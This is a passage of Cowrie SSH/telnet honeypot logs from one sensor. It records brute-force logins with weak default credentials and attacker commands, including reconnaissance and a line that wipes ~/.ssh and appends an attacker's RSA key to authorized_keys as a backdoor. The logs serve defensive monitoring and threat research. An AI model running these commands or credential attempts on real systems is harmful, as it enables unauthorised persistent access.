sh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:28:05.454467Z","src_ip":"212.227.125.160","session":"3fb70244e386"}
{"eventid":"cowrie.login.success","username":"root","password":"Pa$$w0rd","message":"login attempt [root/Pa$$w0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:28:06.124542Z","src_ip":"212.227.125.160","session":"3fb70244e386"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:28:06.681830Z","src_ip":"212.227.125.160","session":"3fb70244e386"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:28:06.682551Z","src_ip":"212.227.125.160","session":"3fb70244e386"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:28:06.912393Z","src_ip":"212.227.125.160","session":"3fb70244e386"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:28:06.913442Z","src_ip":"212.227.125.160","session":"3fb70244e386"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41016,"dst_ip":"1.2.3.4","dst_port":22,"session":"205d98b294f3","protocol":"ssh","message":"New connection: 212.227.235.229:41016 (1.2.3.4:22) [session: 205d98b294f3]","sensor":"my-vps","timestamp":"2025-08-28T06:28:11.745831Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:28:11.746846Z","src_ip":"212.227.235.229","session":"205d98b294f3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:28:12.726491Z","src_ip":"212.227.235.229","session":"205d98b294f3"}
{"eventid":"cowrie.login.success","username":"root","password":"Pa$$w0rd","message":"login attempt [root/Pa$$w0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:28:14.162157Z","src_ip":"212.227.235.229","session":"205d98b294f3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:28:14.703369Z","src_ip":"212.227.235.229","session":"205d98b294f3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:28:14.704104Z","src_ip":"212.227.235.229","session":"205d98b294f3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:28:14.957123Z","src_ip":"212.227.235.229","session":"205d98b294f3"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:28:14.958275Z","src_ip":"212.227.235.229","session":"205d98b294f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60540,"dst_ip":"1.2.3.4","dst_port":22,"session":"3cb426159c37","protocol":"ssh","message":"New connection: 212.227.235.229:60540 (1.2.3.4:22) [session: 3cb426159c37]","sensor":"my-vps","timestamp":"2025-08-28T06:28:17.635995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:28:17.639334Z","src_ip":"212.227.235.229","session":"3cb426159c37"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33126,"dst_ip":"1.2.3.4","dst_port":22,"session":"3412082a363d","protocol":"ssh","message":"New connection: 212.227.235.229:33126 (1.2.3.4:22) [session: 3412082a363d]","sensor":"my-vps","timestamp":"2025-08-28T06:28:18.545565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:28:18.547094Z","src_ip":"212.227.235.229","session":"3412082a363d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/1092f3da081f46047853850eaeeae92393bc1e307b2916a1e6ed70b100fbb2d5","size":524,"shasum":"1092f3da081f46047853850eaeeae92393bc1e307b2916a1e6ed70b100fbb2d5","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/1092f3da081f46047853850eaeeae92393bc1e307b2916a1e6ed70b100fbb2d5 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:28:20.099411Z","src_ip":"212.227.125.160","session":"ee0806ee4428"}
{"eventid":"cowrie.session.closed","duration":180.11901021003723,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:28:20.105627Z","src_ip":"212.227.125.160","session":"ee0806ee4428"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:28:20.430189Z","src_ip":"212.227.235.229","session":"3412082a363d"}
{"eventid":"cowrie.login.success","username":"root","password":"ABCDabcd1234","message":"login attempt [root/ABCDabcd1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:28:21.187782Z","src_ip":"212.227.235.229","session":"3412082a363d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39584,"dst_ip":"1.2.3.4","dst_port":22,"session":"bddb494ed28d","protocol":"ssh","message":"New connection: 212.227.125.160:39584 (1.2.3.4:22) [session: bddb494ed28d]","sensor":"my-vps","timestamp":"2025-08-28T06:28:21.746285Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:28:21.747198Z","src_ip":"212.227.125.160","session":"bddb494ed28d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:28:21.830300Z","src_ip":"212.227.235.229","session":"3412082a363d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:28:21.831027Z","src_ip":"212.227.235.229","session":"3412082a363d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:28:21.832060Z","src_ip":"212.227.235.229","session":"3412082a363d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:28:21.970078Z","src_ip":"212.227.125.160","session":"bddb494ed28d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:28:22.087017Z","src_ip":"212.227.235.229","session":"3412082a363d"}
{"eventid":"cowrie.login.failed","username":"git","password":"123456","message":"login attempt [git/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:28:22.632198Z","src_ip":"212.227.125.160","session":"bddb494ed28d"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:28:23.851784Z","src_ip":"212.227.125.160","session":"bddb494ed28d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:28:24.566228Z","src_ip":"212.227.235.229","session":"3412082a363d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T06:28:24.566901Z","src_ip":"212.227.235.229","session":"3412082a363d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T06:28:24.828955Z","src_ip":"212.227.235.229","session":"3412082a363d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:28:24.829886Z","src_ip":"212.227.235.229","session":"3412082a363d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37786,"dst_ip":"1.2.3.4","dst_port":22,"session":"9eecc927378c","protocol":"ssh","message":"New connection: 212.227.235.229:37786 (1.2.3.4:22) [session: 9eecc927378c]","sensor":"my-vps","timestamp":"2025-08-28T06:28:25.071268Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:28:25.111539Z","src_ip":"212.227.235.229","session":"9eecc927378c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:28:26.233897Z","src_ip":"212.227.235.229","session":"9eecc927378c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T06:28:27.556300Z","src_ip":"212.227.235.229","session":"9eecc927378c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48826,"dst_ip":"1.2.3.4","dst_port":22,"session":"50f8b3006e60","protocol":"ssh","message":"New connection: 212.227.235.229:48826 (1.2.3.4:22) [session: 50f8b3006e60]","sensor":"my-vps","timestamp":"2025-08-28T06:28:28.158863Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:28:28.159541Z","src_ip":"212.227.235.229","session":"50f8b3006e60"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":50608,"dst_ip":"1.2.3.4","dst_port":23,"session":"8f34fdbe5962","protocol":"telnet","message":"New connection: 8.222.212.69:50608 (1.2.3.4:23) [session: 8f34fdbe5962]","sensor":"my-vps","timestamp":"2025-08-28T06:28:28.283492Z"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:28:28.406907Z","src_ip":"212.227.235.229","session":"50f8b3006e60"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:28:28.807416Z","src_ip":"212.227.235.229","session":"9eecc927378c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40442,"dst_ip":"1.2.3.4","dst_port":22,"session":"da5716c17787","protocol":"ssh","message":"New connection: 212.227.235.229:40442 (1.2.3.4:22) [session: da5716c17787]","sensor":"my-vps","timestamp":"2025-08-28T06:28:29.070101Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:28:29.080282Z","src_ip":"212.227.235.229","session":"da5716c17787"}
{"eventid":"cowrie.login.failed","username":"git","password":"123456","message":"login attempt [git/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:28:29.149792Z","src_ip":"212.227.235.229","session":"50f8b3006e60"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:28:30.399053Z","src_ip":"212.227.235.229","session":"50f8b3006e60"}
{"eventid":"cowrie.session.closed","duration":31.167598724365234,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:28:30.770366Z","src_ip":"8.222.212.69","session":"f5ab5764a411"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:28:30.999574Z","src_ip":"212.227.235.229","session":"da5716c17787"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:28:31.141057Z","src_ip":"212.227.235.229","session":"3cb426159c37"}
{"eventid":"cowrie.session.closed","duration":"13.5","message":"Connection lost after 13.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:28:31.142852Z","src_ip":"212.227.235.229","session":"3cb426159c37"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:28:32.153802Z","src_ip":"212.227.235.229","session":"da5716c17787"}
{"eventid":"cowrie.session.closed","duration":"13.9","message":"Connection lost after 13.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:28:32.410885Z","src_ip":"212.227.235.229","session":"3412082a363d"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:28:32.415431Z","src_ip":"212.227.235.229","session":"da5716c17787"}
{"eventid":"cowrie.session.closed","duration":31.95953345298767,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:28:36.255935Z","src_ip":"8.222.212.69","session":"adeeff684f17"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51542,"dst_ip":"1.2.3.4","dst_port":22,"session":"81445c1a219f","protocol":"ssh","message":"New connection: 212.227.125.160:51542 (1.2.3.4:22) [session: 81445c1a219f]","sensor":"my-vps","timestamp":"2025-08-28T06:28:37.936664Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:28:37.937578Z","src_ip":"212.227.125.160","session":"81445c1a219f"}
